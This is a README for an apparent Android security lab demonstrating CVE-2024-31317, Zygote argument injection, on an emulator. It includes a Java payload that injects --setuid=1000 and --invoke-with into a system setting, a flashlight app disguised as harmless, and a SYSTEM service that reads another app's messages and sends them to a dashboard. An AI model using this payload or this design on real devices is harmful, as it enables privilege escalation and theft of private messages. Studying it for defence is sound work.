Exploit for Deserialization of Untrusted Data in Google Android CVE-2024-31317

## https://sploitus.com/exploit?id=561845C5-0B71-55BD-8832-B8F78D805597
# 🔥 ZygoteExploitDemo - CVE-2024-31317 Android Security Lab



### 🚨 Educational Demonstration of Android Zygote Injection Vulnerability

[![GitHub stars](https://img.shields.io/github/stars/GitAmanS/ZygoteExploitDemo?style=social)](https://github.com/GitAmanS/ZygoteExploitDemo/stargazers)
[![GitHub forks](https://img.shields.io/github/forks/GitAmanS/ZygoteExploitDemo?style=social)](https://github.com/GitAmanS/ZygoteExploitDemo/network/members)
[![GitHub license](https://img.shields.io/github/license/GitAmanS/ZygoteExploitDemo)](https://github.com/GitAmanS/ZygoteExploitDemo/blob/main/LICENSE)



---

## 📋 Overview

This lab demonstrates **CVE-2024-31317**, a critical Android vulnerability that allows a malicious app to escalate privileges to **SYSTEM level (UID 1000)** and bypass the Android sandbox to read data from other applications in real-time.

### 🎯 What This Demo Shows

| Stage | Description | Visual |
|-------|-------------|--------|
| **1** | User installs innocent-looking "Flashlight Pro" app | 🔦 |
| **2** | App exploits CVE-2024-31317 to gain SYSTEM access | 💉 |
| **3** | SYSTEM-level service reads "SecureChat" messages | 👁️ |
| **4** | Stolen messages appear on live dashboard | 📊 |

---

## 🏗️ Project Structure

```
ZygoteExploitDemo/
├── 📱 apps/
│   ├── SecureChat/              # Victim app (Jetpack Compose)
│   │   ├── Encrypted messages stored in SQLite
│   │   └── Simulates WhatsApp-style encryption
│   │
│   ├── FlashlightPro/           # Malicious app with exploit
│   │   ├── Normal flashlight UI (distraction)
│   │   ├── Background exploit service
│   │   └── WRITE_SECURE_SETTINGS permission
│   │
│   └── MonitorService/          # SYSTEM-level reader
│       ├── Runs with UID 1000 after exploit
│       ├── Reads SecureChat database
│       └── Exfiltrates to dashboard
│
├── 📊 dashboard/                # Flask web dashboard
│   └── app.py                   # Shows stolen messages live
│
├── 📜 scripts/                  # Automation scripts
│   ├── setup_vulnerable_emulator.sh
│   ├── build_all_apps.sh
│   ├── install_all_apps.sh
│   ├── run_exploit.py
│   └── monitor_logs.sh
│
├── 🎯 exploits/                 # Exploit information
│   ├── CVE-2024-31317.md
│   └── payloads.txt
│
└── 📁 tamplates/                # Code templates
    ├── exploit_template.java
    └── dashboard_template.html
```

---

## 🔧 Technical Details

### The Vulnerability

CVE-2024-31317 exists in how Android's Zygote process handles the `hidden_api_blacklist_exemptions` system setting. Due to missing input sanitization, an attacker can inject newline characters to add arbitrary arguments to Zygote commands.

**Attack Vector:**

```java
Settings.Global.putString(
    contentResolver,
    "hidden_api_blacklist_exemptions",
    "LClass1;->method1(\n" +
    "7\n" +
    "--setuid=1000\n" +     // Run as SYSTEM
    "--setgid=1000\n" +     // Run as SYSTEM group
    "--invoke-with\n" +
    "am start-service ...;\n"
);
```

### Affected Versions

| Version | Status |
|---------|--------|
| Android 9 - 14 | ❌ Vulnerable (pre-June 2024 patch) |
| Android 14+ | ✅ Patched (June 2024 security update) |
| Android 15+ | ✅ Secure |

---

## 🚀 Quick Start Guide

### Prerequisites

- ✅ Android Studio (latest)
- ✅ Python 3.8+ with Flask
- ✅ Android SDK with platform tools
- ✅ 10GB free disk space for emulator

### Step 1: Clone the Repository

```bash
git clone https://github.com/GitAmanS/ZygoteExploitDemo.git
cd ZygoteExploitDemo
```

### Step 2: Set Up Vulnerable Emulator

```bash
cd scripts
chmod +x *.sh
./setup_vulnerable_emulator.sh

# Start the emulator
emulator -avd vulnerable_android_12
```

### Step 3: Build and Install Apps

```bash
# In a new terminal
cd ZygoteExploitDemo/scripts
./build_all_apps.sh
./install_all_apps.sh
```

### Step 4: Start the Dashboard

```bash
cd ../dashboard
pip3 install flask flask-cors
python3 app.py
```

📱 **Open http://localhost:5000 in your browser**

### Step 5: Run the Exploit

```bash
cd ../scripts
python3 run_exploit.py
```

### Step 6: Watch the Magic ✨

1. Open **SecureChat** app in emulator
2. Send some test messages
3. Watch them appear on the dashboard **instantly! 🔴**

---

## 📸 Demo Video

> 🎬 *Demo video coming soon*

---

## 🔬 How It Works - Step by Step

1. **FlashlightPro** requests `WRITE_SECURE_SETTINGS` permission
2. Exploit code injects malicious payload into Zygote settings
3. Zygote spawns **MonitorService** with SYSTEM privileges (UID 1000)
4. SYSTEM service bypasses Android sandbox restrictions
5. Direct database read from `/data/data/com.securechat/databases/`
6. Exfiltration to Flask dashboard via HTTP POST
7. Real-time display of stolen encrypted messages

---

## 📚 Learning Resources

- [Android Security Bulletins](https://source.android.com/security/bulletin)
- [CVE-2024-31317 Details](https://nvd.nist.gov/vuln/detail/CVE-2024-31317)
- [Original PoC by CleoV2](https://github.com/cleov2)

---

## 🤝 Contributing

Contributions are welcome! Please:

1. Fork the repository
2. Create a feature branch
3. Submit a Pull Request

**Areas for contribution:**

- 🎯 Additional exploit payloads
- 🛡️ Better detection methods
- 📖 Improved documentation
- 🌍 Translation to other languages

---

## 📄 License

MIT License - See [LICENSE](LICENSE) file for details

---

## 👨‍💻 Author

**Aman** - [@GitAmanS](https://github.com/GitAmanS)

---

## ⭐ Support

If you found this educational, please give it a star! ⭐

---



**Made for security researchers, by a security researcher**

Remember: With great power comes great responsibility 🕷️